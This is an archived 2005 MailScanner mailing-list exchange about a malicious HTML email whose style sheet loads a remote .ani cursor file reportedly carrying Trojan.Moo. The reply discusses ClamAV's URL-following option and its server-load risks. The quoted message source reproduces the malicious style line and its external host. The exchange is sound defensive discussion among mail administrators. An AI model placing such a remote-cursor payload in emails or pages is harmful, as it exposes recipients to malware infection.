Virus in HTML Email Style Sheet
Rick Cooper
rcooper at DWFORD.COM
Tue Mar 29 17:04:56 IST 2005
[ The following text is in the "iso-8859-1" character set. ]
[ Your display is set for the "US-ASCII" character set. ]
[ Some characters may be displayed incorrectly. ]
> -----Original Message-----
> From: MailScanner mailing list [mailto:MAILSCANNER at JISCMAIL.AC.UK]On
> Behalf Of Derek Winkler
> Sent: Tuesday, March 29, 2005 9:24 AM
> To: MAILSCANNER at JISCMAIL.AC.UK
> Subject: Virus in HTML Email Style Sheet
>
>
> Here's the HTML source for a message that had a virus in it...
>
> Hey Love<br>I reserved us a place at huoston's tonight.<br>starting to be
> hungry already, for you!!<br>Bob
> <br><br><br><br>
> <style>* {CURSOR: url("http://banukultepe.sitemynet.com/m89.ani")}</style>
>
> When the CURSOR is retrieved it has Trojan.Moo in it according to NAV.
>
> MailScanner did not catch this.
>
> Should there be a disarm URLs in style sheets setting in MailScanner?
>
> Does anyone know of a virus scanner that checks URLs in email as well? I
> thought Clam was doing this.
>
> Thanks,
>
> Derek
>
>
Clam does, if it's configured with --with-libcurl and the MailFollowURLs
option is set in the config file.
To use this feature in the ClamAVModule the bit mask would have to include
Mail::ClamAV::CL_SCAN_MAILURL() and it currently does not. There are obvious
potential DOS problems with this, but I guess the question would be do
enough people want it to warrant Julian adding yet another config option?
One would have to use it with care because it would certainly increase the
server load significantly as it would retrieve any file pointed to by any
url link and then scan it.
Rick
--
This message has been scanned for viruses and
dangerous content by MailScanner, and is
believed to be clean.
------------------------ MailScanner list ------------------------
To unsubscribe, email jiscmail at jiscmail.ac.uk with the words:
'leave mailscanner' in the body of the email.
Before posting, read the MAQ (http://www.mailscanner.biz/maq/) and
the archives (http://www.jiscmail.ac.uk/lists/mailscanner.html).
Support MailScanner development - buy the book off the website!
More information about the MailScanner
mailing list